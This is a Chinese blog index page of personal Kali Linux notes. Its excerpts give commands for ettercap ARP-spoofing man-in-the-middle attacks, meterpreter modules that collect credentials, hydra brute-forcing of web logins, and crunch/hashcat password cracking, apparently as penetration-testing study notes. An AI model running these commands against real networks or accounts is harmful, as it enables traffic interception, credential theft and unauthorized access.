![](https://img-blog.csdnimg.cn/20201014180756926.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
kali笔记
文章平均质量分 80
@pon
这个作者很懒,什么都没留下…
展开
-
arp 欺骗
https://www.cnblogs.com/LyShark/p/10153685.html ettercap 中间人攻击。ettercap -T -q -F /filter.ef -M ARP /目标IP///ettercap -Tqi eth0 -M arp:remote /// /网关ip//driftnet -i 网卡名 -a -d /home/kali/Pictures//etc/init.d/apache2 status # 查看状态。主目录:/var/www/html/原创 2022-10-19 22:47:18 · 384 阅读 · 0 评论 -
msf 笔记 & sqlmap 笔记
msf exploit(handler) > set exitonsession false 运行这条命令后,4444端口会一直处于侦听状态meterpreter > run post/windows/gather/credentials/credential_collector 目标主机上的身份认证信息meterpreter > run post/windows/gather/enum_applications 目标主机安装了哪些软件。原创 2022-10-18 15:41:03 · 507 阅读 · 0 评论 -
hydra 爆破
参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中的内容是表示错误猜解的返回信息提示。hydra -l admin -p password.txt -t 线程 -vV -e ns -f ip http-get /admin/index.php。-P 指定密码字典(文件)原创 2022-10-17 10:14:16 · 574 阅读 · 0 评论 -
crunch 字典生成 hashcat 破解密码
crunch 9 9 -t @@@2003%% >> 999.txt 生成9位密码-b 指定文件输出的大小,避免字典文件过大-c 指定文件输出的行数,即包含密码的个数-d 限制相同元素出现的次数-e 定义停止字符,即到该字符串就停止生成-f 调用库文件(/etc/share/crunch/charset.lst)-i 改变输出格式,即aaa,aab -> aaa,baa-I 通常与-t联合使用,表明该字符为实义字符。原创 2022-10-16 22:59:34 · 1689 阅读 · 0 评论 -
kali个人笔记
ap可以理解为无线路由器,ap的漫游就是为多个ap设置相同的ssid进行组合,这样可以在其它组合起来的ap上不用输入密码就可以提供服务,比如从一楼到五楼只需要输入一次密码就可以实现跨ap的使用,所以附近的ap都是以漫游的形式组网提供无线服务的。因此延伸出,如果是像这种情况下进行攻击嗅探,是不会获取到握手包的,因为当你攻击的ap与客户端断开连接之后,他会认为当前ap不让他用,就自动连接至其它具有相同ssid的ap,也就是说,必须把相同ssid的所有ap都进行监听才会捕获到握手包。原创 2022-10-16 22:53:42 · 1274 阅读 · 0 评论